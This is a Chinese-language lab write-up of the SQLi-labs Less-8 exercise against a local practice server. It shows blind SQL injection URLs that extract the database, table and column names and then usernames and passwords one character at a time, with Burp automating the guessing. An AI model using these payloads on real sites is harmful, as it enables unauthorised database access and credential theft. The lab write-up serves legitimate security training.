程序员经验分享-hwhale

sqlilabs—less8

2023-11-17

Sqlilabs-less8

image-20220224172956445

1、判断注入点

http://127.0.0.1/sqlilabs/Less-8/?id=1' and 1=1%23

2、爆字段

http://127.0.0.1/sqlilabs/Less-8/?id=1' order by 3%23

3、判断数据库

联合查询无果后尝试盲注

(1)判断数据库名长度

http://127.0.0.1/sqlilabs/Less-8/?id=1' and length(database())=8 %23

(2)判断数据库名称

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),1,1)='s' %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),2,1)='e' %23

······

数据库名:security

4、判断表

(1)有几个表

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security')=4 %23

(2)分别判断表长度

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 0,1)=6 %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 1,1)=8 %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 2,1)=7 %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 3,1)=5 %23

数据库:security
表1:长度为6
表2:长度为8
表3:长度为7
表4:长度为5

(3)分别判断表名称

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e' %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),2,1)='m' %23

······

数据库:security
	表1:emails
	表2:referers
	表3:uagents
	表4:users

可以使用burp跑一下,对比长度判断回显

image-20220224200802859

image-20220224200833297

5、判断列

判断可得用户数据可能存放在users表中

(1)判断表中有几个字段(有几列)

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name = 'users')=3 %23

······

(2)判断列长度

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1)=2 %23

(3)判断列名

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1)='i' %23

http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),2,1)='d' %23

······

数据库:security
	表1:emails,3列
		id
		username
		password
	表2:referers
	表3:uagents
	表4:users

6、读取数据

(1)判断几个数据

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(username) from users)=13 %23

(2)判断数据长度

http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(username) from users limit 0,1)=4 %23

······

跑burp得

image-20220224203819617

数据库:security
	表1:emails,3列
		id
		username
		长4
		长8
		长5
		长6
		长6
		长8
		长6
		长5
		长6
		长6
		长6
		长7
		长6
		password

(3)读数据

and ascii(substr((select username from users limit 0,1),1,1))=68%23

一次跑burp得出数据

密码同理

image-20220224204354253

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

SQL注入

渗透测试

web安全

php

sqlilabs—less8 的相关文章

  • $.load 内的表单未正确发布

    这就是我得到的 基本上单击一个按钮并执行以下代码 Readthis MonsterRequest php id Mon TestVar TestVar replace s g Readthis Readthis htmlencode Tes

  • PHP-FPM 和 Nginx:502 错误网关

    配置 Ubuntu 服务器 11 10 64 位 亚马逊AWS Ec2 托管在云上 t1 micro实例 在我写任何其他内容之前 我想声明我已经检查了两者nginx 502 错误网关 https stackoverflow com ques

  • 检测 JPEG 图像质量

    我允许用户上传图像 但是 我希望保持 JPEG 质量不超过 90 我打算做的是检测当前的质量 如果低于 90 什么都不做 如果超过90 则使用Image Magick将图像重新压缩到90 可以这样做吗 我更喜欢 PHP 但任何语言都会有帮助

  • 为 Zend 应用程序提供数据库处理程序的“正确”方法是什么

    假设您严格遵守某个组织的惯例Zend应用程序 http framework zend com manual en zend application html 您应该在哪里设置数据库处理程序以供应用程序开发人员访问 我知道如何设置ZendDb

  • 如果遵循 REST 架构,如何访问 codeigniter 中的 URL 参数?

    以下是可用于访问资源的基于 REST 的有效 URL 使用codeigniter 如何访问下面传递的参数1 我在教程中看到了上述内容并设置了我的代码 然而显然 id this gt input gt get id 不起作用 Using th

  • 正则表达式将从文本文件中提取句子

    我需要一个正则表达式来从文本文件中提取句子 示例文本 以 2004 年底发生的亚洲海啸灾难为例 对 Google 新闻 http news google com 的查询在一个月内 1 月 17 日 返回了超过 80 000 篇有关该事件的在

  • PHP设置全局环境变量的方法

    我已阅读问题 答案here https stackoverflow com questions 13568191 how to get system environment variables into php while running

  • 在 Laravel 中将自定义/新类文件放在哪里?

    我有关于如何使用 Yelp Fusion API 的 PHP 示例 它用OAuth php file https github com Yelp yelp api blob master v2 php lib OAuth php有几个班级

  • mongodb从不同数据库中选择

    我有大约 200 个 mongodb 数据库 每个数据库都有一个名为 Group 的集合 在该集合中有一个名为 meldingId 的字段 是否可以进行一个 mongodb 查询来查找不同数据库中的所有值 我设法通过 selectDB da

  • 在 PHP 中重新定义常量

    是否可以在 php 中重新定义由define功能 我有一个包含多个常量的类 其中包含用户数据 我正在尝试为多个用户使用该类 define ALLEGRO ID id define ALLEGRO LOGIN login define ALL

  • 如何获取与我当前所在商店相关的产品所属类别 ID

    我在产品页面上并拥有产品对象 但是当我尝试使用以下方式获取类别 id 时 product gt getCategoryIds or product gt getResource gt getAttribute category ids gt

  • 在我的 php 网络服务器内副本中启用 mysqli

    正如这里所讨论的 mysqli 直接运行时有效 但通过 js ajax 运行时无效 https stackoverflow com questions 31523601 mysqli works when run directly but

  • 在 WooCommerce 管理订单项目上显示产品自定义字段(也适用于可变产品)

    基于在 WooCommerce 的订单编辑页面上显示自定义字段 https stackoverflow com questions 56259910 show custom fields on the order editing page

  • NetBeans 代码模板 ${date}?

    我在 Eclipse 中有这个代码模板 自 日期 起 当输入时我得到这样的东西 自2009年8月4日起 但是当我添加相同的模板时 自 日期 起 到 NetBeans 它输出 自日期以来 有人可以帮忙吗 还没有答案吗 这在 Netbeans

  • 在生产服务器上使用 Subversion 使文件生效的最佳方法是什么?

    目前我已经设置了 subversion 这样当我在 Eclipse PDT 中进行更改时 我可以提交更改 它们将保存在 home administrator 中项目文件 该文件具有 subversion 推荐的 branches tags

  • 在 jQuery AJAX 成功中从 MySql 获取特定响应

    好吧 我有这个 ajax 代码 它将在 Success 块中返回 MySql 的结果 ajax type POST url index php success function data alert data My Query sql SE

  • Paypal IPN 发送“待处理”并以“多币种”为理由?

    我正在使用 Paypal IPN 从我的网站收款 该网站目前仅处于开发阶段 因此我建立了一个沙盒网站进行测试 并且我已经通过在英国注册的测试帐户非常成功地以英镑货币 我的居住国货币 进行付款 但是 我希望该网站能够检测访问者的原籍国并允许他

  • 递归获取数组的键并创建下划线分隔的字符串

    现在我得到了一个包含某种信息的数组 我需要从中创建一个表 例如 Student Address StreetAddress gt Some Street StreetName gt Some Name Marks1 gt 100 Marks

  • WordPress 中的 add_action 函数

    嗯 我正在学习创建一个 WordPress 插件 我下载了一个并阅读了代码 然后我看到了这个 我假设 foo 是它将添加操作的标签 但是 array 到底是做什么的呢 add action foo array foo1 foo2 我在看ht

  • Zend Framework 生成唯一的字符串

    我想生成一个唯一的 4 6 个字符长的字母数字字符串 以便与每个记录 用户 一起保存在数据库中 db 字段具有唯一索引 因此尝试保存预先存在的字符串会生成错误 现在我正在生成一个随机字符串并使用 try catch 因此在添加新记录时如果抛

随机推荐

  • uc浏览器显示服务器错误,使用UC浏览器打开网页报错,无法播放优酷官网视频...

    适用产品 HUAWEI MateBook 13 2021款intel i7 8g 512g 集显 触屏 2020 锐龙版 amd r5 16g 512g 集显 锐龙版2020款 amd r5 8g 512g 集显 触屏 2021款 inte

  • 机器学习学习笔记——数据集划分(留出法)

    编译工具 pycharm 学习工具 Anaconda notebook 在机器学习算法中 我们通常将原始数据集划分为三个部分 划分要尽可能保持数据分布的一致性 1 Training set 训练集 训练模型 2 Validation set

  • 使用shell(sh)文件批量修改文件的权限

    最近在www coolketang com上实现了苹果移动端互动教程的Web化 但是课程资料在上传到云服务器时 总是出现权限问题 而无法打开 所以写了个脚本 在上传服务器之前 批量修改资源的权限 代码较少 可以直接阅读 编辑完保存为 sh文

  • 最强自动化测试框架Playwright (27)-跟踪查看器

    Playwright Trace Viewer 是一个 GUI 工具 可帮助您在脚本运行后探索记录的 Playwright 跟踪 可以本地打开 也可以在trace playwright dev 打开 录制跟踪文件 使用context tra

  • 在物联网中应用机器学习

    欢迎大家前往腾讯云 社区 获取更多腾讯海量技术实践干货哦 本文由未来守护者发表于云 社区专栏 本项目探讨如何将机器学习 Machine learning 应用到物联网 IoT Internet of Things 中 我们将使用 Andro

  • 关于数据分析流程详解

    在数据分析过程中 主要是以下几个过程 一 明确分析目的 首先要明确自己的分析目的 只有明确目的的分析才能更有效的解决自己的问题 打到自己的目的 大量数据 试探性的分析除外 但是即使是试探性的分析过程 前期也是需要一个假设的分析目的的 二 数

  • split()正则表达式按照长度切割

    String split s s length 2 gt 0 split lt G 2 正则表达式匹配 按2位长度分割

  • 期货止损篇1:固定点数止损真的好用,只是90%的人都用错了

    最近问到止损的朋友比较多 这个系列跟大家分享下个人对于止损的一些看法 每个人刚入市的时候 最常听到的就是固定点数止损 比如固定3个点止损 固定10个点止损 固定20个点止损 固定50个点止损 用久了 很多人就抱怨这个方法不靠谱 大师是不是留

  • Keil报错 requires ANSI-style prototype

    在进行模块化程序设计时遇到这种error 这是头文件没有定义的问题 首先在同一个目录下建立一个 h文件 第二步打开文件 进行编辑 要用到 ifndef define endif 这是为了避免重复定义 ifndef后面跟的是头文件名称的大写

  • matlab 浅浅实现随机森林(Random forest)算法对高光谱图像数据进行分类,输出分类结果图和精度评价

    利用随机森林 Random forest 算法对数据进行分类 输出分类结果图 利用验证样本集计算出分类结果的混淆矩阵 输出分类结果的整体分类精度 和每一类地 物的分类精度 emmm不要对下面的内容报有太大的期待 要求使用随机森林算法 我尝试

  • UE4如何上传文件

    上传文件示例代码 InUrl为上传URL InFiles为本地文件路径的数组 Boundary为分隔符 用来分隔文件 其他地方不能出现该字符串 每个文件都以 r n Boundary r n 开始 即BeginBoundry 分隔符之后是文

  • Unity中AnimatorController的配置

    AnimatorController 动画控制器 的配置编辑是在Unity的Animator视图中完成的 通过在Animator视图中创建动画状态 以及设置过渡条件 构建动画状态机 以可视化地控制动画的播放 下面介绍一些配置动画控制器的要点

  • ord(readfn(1)) TypeError: ord() expected a character, but string of length 0 found --记录

    背景 从git clone 下来一个 Django 1 1项目 而本地安装是 Django 3 3 而且 使用了whoosh 出现如下问题 File usr local lib python3 7 site packages whoosh

  • Mysql error 1045的解决

    网上千篇一律给的答案是改配置文件 百度第一页都是 其实改的那项配置是让MySQL按安全模式启动 该模式不用输入密码 看似解决了问题 其实不是问题的原因 搜一下官方文档可以很容易发现 1045的含义是 用户名或密码错误 所以 再遇到1045

  • Doris编译

    使用Doris 官方不提供编译好的jar包 需要自己编译 最方便的方式是通过Docker编译 避免了安装各种环境的繁琐 一 准备服务器 用虚拟机 云服务器都可以编译 不过编译所需要的内存以16G为佳 如果你的机器没有这么多内存 速度会比较慢

  • fatal: unable to access ‘https://github.com/xxx‘: Failed to connect to github.com

    执行这两行命令 端口号改成自己代理服务器的端口 我的是7890 git config global https proxy 127 0 0 1 7890 git config global http proxy 127 0 0 1 7890

  • Bash中各种括号的使用

    Bash中有各种括号 包括单小括号 双小括号 单中括号 双中括号 单大括号 而且它们之间很容易混淆 所以很有必要总结一下它们的用法 1 的用法 单个小括号用来创建一个子shell 例如 pwd home xfeng cd tmp pwd t

  • VMware虚拟网络编辑器配置

    一 NAT模式网络设置 把下面的ip 子网掩码 网关记住 切换到network scripts 目录下 cd etc sysconfig network scripts 修改ifcfg ens33 这个文件 下图圈2的IPADDR设置一个在

  • 洛谷 P1046 陶陶摘苹果

    该问题涉及数组的输入和输出问题 以及数据的换行输入问题 较为简单 题目描述 陶陶家的院子里有一棵苹果树 每到秋天树上就会结出 1010 个苹果 苹果成熟的时候 陶陶就会跑去摘苹果 陶陶有个 3030 厘米高的板凳 当她不能直接用手摘到苹果的

  • sqlilabs—less8

    文章目录 Sqlilabs less8 1 判断注入点 2 爆字段 3 判断数据库 1 判断数据库名长度 2 判断数据库名称 4 判断表 1 有几个表 2 分别判断表长度 3 分别判断表名称 5 判断列 1 判断表中有几个字段 有几列 2

热门标签